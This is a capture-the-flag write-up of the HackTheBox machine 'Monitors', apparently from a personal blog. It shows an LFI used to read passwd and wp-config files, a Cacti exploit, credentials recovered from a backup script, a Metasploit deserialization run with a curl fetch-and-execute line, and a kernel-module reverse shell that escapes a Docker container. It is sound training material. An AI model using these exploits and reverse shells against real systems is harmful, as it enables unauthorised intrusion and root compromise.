Monitors - [HTB]

Cover Image for Monitors - [HTB]
Marmeus
Marmeus

Table of Contents

    Introduction

    Monitors is a hard linux OSCP like machine from HackTheBox where you will several web page vulnerabilities until getting user's creds. Finally, you will have to escape from a docker container, where you will have to exploit some capabilities in order to become root.

    Enumeration

    As always, let's start finding all opened ports in the machine with nmap.

    kali@kali:~/Documents/HTB/Monitors$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.10.238
    Nmap scan report for 10.10.10.238
    Host is up (0.048s latency).
    Not shown: 65533 closed ports
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    
    # Nmap done at Sat Jul 24 13:44:49 2021 -- 1 IP address (1 host up) scanned in 55.04 seconds

    Then, we continue with a deeper scan of every opened port, getting more information about each service.

    kali@kali:~/Documents/HTB/Monitors$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,80 10.10.10.238
    Nmap scan report for 10.10.10.238
    Host is up (0.047s latency).
    
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
    |   256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
    |_  256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: Site doesn't have a title (text/html; charset=iso-8859-1).
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Accesing to port 80 there we have a message telling us that we can not access to the web server using an IP.

    direct ip access is not allowed

    Adding the email domain monitors.htb to the /etc/hosts file we can access to the following wordpress page.

    image-20210724195022152

    Enumerating with wpscan we can obtain all plugins installed.

    $ wpscan --url http://monitors.htb/ -e ap,u,cb
    [i] Plugin(s) Identified:
    
    [+] wp-with-spritz
     | Location: http://monitors.htb/wp-content/plugins/wp-with-spritz/
     | Latest Version: 1.0 (up to date)
     | Last Updated: 2015-08-20T20:15:00.000Z
     |
     | Found By: Urls In Homepage (Passive Detection)
     |
     | Version: 4.2.4 (80% confidence)
     | Found By: Readme - Stable Tag (Aggressive Detection)
     |  - http://monitors.htb/wp-content/plugins/wp-with-spritz/readme.txt

    The plugin spritz has an LFI / RFI vulnerability.

    Exploitation

    Thanks to the vulnerability we can obtain the users registered on the system.

    http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../etc/passwd
    root:x:0:0:root:/root:/bin/bash
    [...]
    marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash

    Furthermore, we can obtain the wordpress database cred and other domain.

    view-source:http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../../../wp-config.php
    [...]
    /** MySQL database username */
    define( 'DB_USER', 'wpadmin' );
    /** MySQL database password */
    define( 'DB_PASSWORD', 'BestAdministrator@2020!' );
    
    view-source:http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/apache2/sites-enabled/000-default.conf
    # Default virtual host settings
    # Add monitors.htb.conf
    # Add cacti-admin.monitors.htb.conf

    Adding the domain cacti-admin.monitors.htb into the /etc/hosts we can access to the cacti login form.

    image-20210724210726385

    We can login as admin with the Mysql database password.

    The cacti version 1.2.12 has an associated exploit allowing us to obtain a reverse shell as the user www-data.

    kali@kali:~/Documents/HTB/Monitors$ python3 CactiExploit.py -t http://cacti-admin.monitors.htb -u admin -p 'BestAdministrator@2020!' --lhost 10.10.14.209 --lport 443
    [+] Connecting to the server...
    [+] Retrieving CSRF token...
    [+] Got CSRF token: sid:ac3fbf8f5163e68c4ded3c22646f2ca5a6c3961b,1627157074
    [+] Trying to log in...
    [+] Successfully logged in!
    
    [+] SQL Injection:
    "name","hex"
    "",""
    "admin","$2y$10$TycpbAes3hYvzsbRxUEbc.dTqT0MdgVipJNBYu8b7rUlmB8zn8JwK"
    "guest","43e9a4ab75570f5b"
    
    [+] Check your nc listener!
    kali@kali:~/Documents/HTB/Monitors$  nc -lnvp 443
    listening on [any] 8787 ...
    connect to [10.10.14.209] from (UNKNOWN) [10.10.10.238] 36118
    /bin/sh: 0: can't access tty; job control turned off
    $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

    Privilege Escalation 1

    Enumerating the file system appears a cacti service file, which executes a backup.sh file inside marcu's home folder.

    www-data@monitors:/$ find / -name "cacti*" 2>/dev/null
    [...]
    /etc/systemd/system/cacti-backup.service
    www-data@monitors:/$ cat /etc/systemd/system/cacti-backup.service
    [...]
    ExecStart=/home/marcus/.backup/backup.sh
    [...]

    Reading this file we can obtain a password.

    www-data@monitors:/home/marcus/.backup$ cat /home/marcus/.backup/backup.sh
    #!/bin/bash
    
    backup_name="cacti_backup"
    config_pass="VerticalEdge2020"
    
    zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
    sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
    rm /tmp/${backup_name}.zip

    This password can be used to become become marcus, getting the user flag.

    www-data@monitors:~$ su marcus
    Password: VerticalEdge2020
    marcus@monitors:~/.backup$ id
    uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)
    marcus@monitors:~$ cat user.txt
    [CENSORED]

    Privilege Escalation 2

    Executing linpeas appears the port 8443 listening for localhost.

    [...]             
    tcp        0      0 127.0.0.1:8443          0.0.0.0:*               
    [...]  

    We can access to it using SSH port forwarding.

    kali@kali:~/Documents/HTB/Monitors$ ssh marcus@10.10.10.238 -L 127.0.0.1:8443:localhost:8443 -fN

    Accessing the port with firefox through the protocol HTTPS we get a Tomcat error, showing the Tomcat's version (9.0.31). Looking for associated vulns we can obtain a metasploit module apache_ofbiz_deserialization.

    msf6 > use exploit/linux/http/apache_ofbiz_deserialization
    msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set rhosts 127.0.0.1
    msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set payload linux/x86/shell/reverse_tcp
    msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set lhost 10.10.14.209
    msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set lport 4444
    msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set forceexploit true
    msf6 exploit(linux/http/apache_ofbiz_deserialiation) > show options
    
    Module options (exploit/linux/http/apache_ofbiz_deserialiation):
    
       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT      8443             yes       The target port (TCP)
       SSL        true             no        Negotiate SSL/TLS for outgoing connections
       SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
       TARGETURI  /                yes       Base path
       URIPATH                     no        The URI to use for this exploit (default is random)
       VHOST                       no        HTTP server virtual host
    
    
    Payload options (linux/x86/shell/reverse_tcp):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  10.10.14.209      yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       1   Linux Dropper
    
    
    msf6 exploit(linux/http/apache_ofbiz_deserialiation) > run
    
    [*] Started reverse TCP handler on 10.10.14.209:4444 
    [*] Executing automatic check (disable AutoCheck to override)
    [!] The target is not exploitable. Target cannot deserialize arbitrary data. ForceExploit is enabled, proceeding with exploitation.
    [*] Executing Linux Dropper for linux/x86/shell/reverse_tcp
    [*] Using URL: http://0.0.0.0:8080/re6R4gMz4969w
    [*] Local IP: http://23.6.17.150:8080/re6R4gMz4969w
    [+] Successfully executed command: sh -c curl${IFS}-so${IFS}/tmp/RXsgDGlc${IFS}http://10.10.14.209:8080/re6R4gMz4969w;chmod${IFS}+x${IFS}/tmp/RXsgDGlc;/tmp/RXsgDGlc;rm${IFS}-f${IFS}/tmp/RXsgDGlc
    [*] Client 10.10.10.238 (curl/7.64.0) requested /re6R4gMz4969w
    [*] Sending payload to 10.10.10.238 (curl/7.64.0)
    [*] Command Stager progress - 103.95% done (158/152 bytes)
    [*] Sending stage (36 bytes) to 10.10.10.238
    [*] Command shell session 1 opened (10.10.14.209:4444 -> 10.10.10.238:41252) at 2021-07-25 18:54:45 +0200
    [*] Server stopped.
    
    id
    uid=0(root) gid=0(root) groups=0(root)

    Now, we are inside a docker container with some capabilities.

    root@77ff21ad5db2:/tmp/temp# capsh --print
    capsh --print
    Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
    Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
    Securebits: 00/0x0/1'b0
     secure-noroot: no (unlocked)
     secure-no-suid-fixup: no (unlocked)
     secure-keep-caps: no (unlocked)
    uid=0(root)
    gid=0(root)
    groups=

    Between all of them, stands out the capabilit CAP_SYS_MODULE, allowing us to become root in the machine following this post.

    Going to the point, you need to create these files. (You can download them from your kali machine)

    Note: Do not forget to change the IP for you kali's machine and the identation in the Makefile MUST be tabs.

    root@77ff21ad5db2:/tmp/temp# cat reverse-shell.c
    #include <linux/kmod.h>
    #include <linux/module.h>
    MODULE_LICENSE("GPL");
    MODULE_AUTHOR("AttackDefense");
    MODULE_DESCRIPTION("LKM reverse shell module");
    MODULE_VERSION("1.0");
    char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.209/4445 0>&1", NULL};
    static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
    static int __init reverse_shell_init(void) {
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
    }
    static void __exit reverse_shell_exit(void) {
    printk(KERN_INFO "Exiting\n");
    }
    module_init(reverse_shell_init);
    module_exit(reverse_shell_exit);
    
    
    root@77ff21ad5db2:/tmp/temp# cat Makefile
    obj-m +=reverse-shell.o
    all:
            make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) modules
    clean:
            make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) clean

    Then, execute the make command in the same directory as the files are stored, obtaining the following output.

    root@77ff21ad5db2:/tmp/temp# make
    make -C /lib/modules/4.15.0-142-generic/build M=/tmp/temp modules
    make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
      CC [M]  /tmp/temp/reverse-shell.o
      Building modules, stage 2.
      MODPOST 1 modules
      CC      /tmp/temp/reverse-shell.mod.o
      LD [M]  /tmp/temp/reverse-shell.ko
    make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'

    Finally, listen with nc at port 4445 and execute the final command.

    root@77ff21ad5db2:/tmp/temp# insmod reverse-shell.ko
    insmod reverse-shell.ko
    
    
    kali@kali:~/Documents/HTB/Monitors$ nc -nlvp 4445
    listening on [any] 4445 ...
    connect to [10.10.14.209] from (UNKNOWN) [10.10.10.238] 37878
    bash: cannot set terminal process group (-1): Inappropriate ioctl for device
    bash: no job control in this shell
    root@monitors:/# cat /root/root.txt
    [CENSORED]